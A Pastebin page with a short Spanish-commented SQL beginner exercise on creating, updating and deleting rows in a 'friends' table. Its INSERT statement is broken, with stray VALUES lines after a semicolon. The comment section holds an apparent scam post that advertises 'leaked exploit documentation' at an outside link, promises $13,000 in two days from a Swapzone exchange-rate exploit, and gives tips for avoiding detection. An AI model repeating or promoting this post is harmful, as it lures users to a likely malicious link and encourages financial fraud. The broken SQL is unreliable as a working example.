Fobic__P

SQL BASICS SPANISH DOC

Oct 8th, 2022
2,581
0
Never
10
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
SQL 0.77 KB | None | 0 0
  1. -- CREANDO LA TABLA Y LOS PARAMETROS
  2. CREATE TABLE friends (
  3.   id INTEGER,
  4.   name TEXT,
  5.   birthday DATE
  6. );
  7. -- INSERTAR DATOS INICIALES
  8. INSERT INTO friends (id, name, birthday)
  9. VALUES (1, 'Ororo Munroe', '1940-05-30' );
  10. VALUES (2, 'Ivan Perez', '2006-08-31' );
  11. VALUES (3, 'Fabio Perez', '2003-05-15' );
  12.  
  13.  
  14. --ALTERAR TABLA Y AGREGAR COLUMNA
  15. ALTER TABLE friends
  16. ADD COLUMN email TEXT;
  17.  
  18. --ACTUALIZAR DATOS
  19. UPDATE friends
  20. SET name = 'Storm'
  21. WHERE id = 1;
  22.  
  23.  
  24. --AGREGAR DATOS A LA COLUMNA NUEVA
  25.  
  26. UPDATE friends
  27. SET email = '[email protected]'
  28. WHERE id = 2;
  29.  
  30. UPDATE friends
  31. SET email = '[email protected]'
  32. WHERE id = 3;
  33.  
  34. UPDATE friends
  35. SET email = '[email protected]'
  36. WHERE id = 1;
  37.  
  38.  
  39. --REMOVER DATOS
  40. DELETE FROM friends
  41. WHERE id = 1;
  42.  
  43. SELECT *
  44. FROM friends;
Advertisement
Comments
  • Pranu90
    170 days
    # CSS 0.78 KB | 0 0
    1. ✅ Leaked Exploit Documentation:
    2.  
    3. https://rawtext.host/raw?44lh4m
    4.  
    5. This made me $13,000 in 2 days.
    6.  
    7. Important: If you plan to use the exploit more than once, remember that after the first successful swap you must wait 24 hours before using it again. Otherwise, there is a high chance that your transaction will be flagged for additional verification, and if that happens, you won't receive the extra 38% — they will simply correct the exchange rate.
    8. The first COMPLETED transaction always goes through — this has been tested and confirmed over the last days.
    9.  
    10. Edit: I've gotten a lot of questions about the maximum amount it works for — as far as I know, there is no maximum amount. The only limit is the 24-hour cooldown (1 use per day without any verification from Swapzone — instant swap).
  • User was banned
  • User was banned
  • User was banned
  • User was banned
  • User was banned
  • User was banned
  • User was banned
  • User was banned
  • User was banned
Add Comment
Please, Sign In to add comment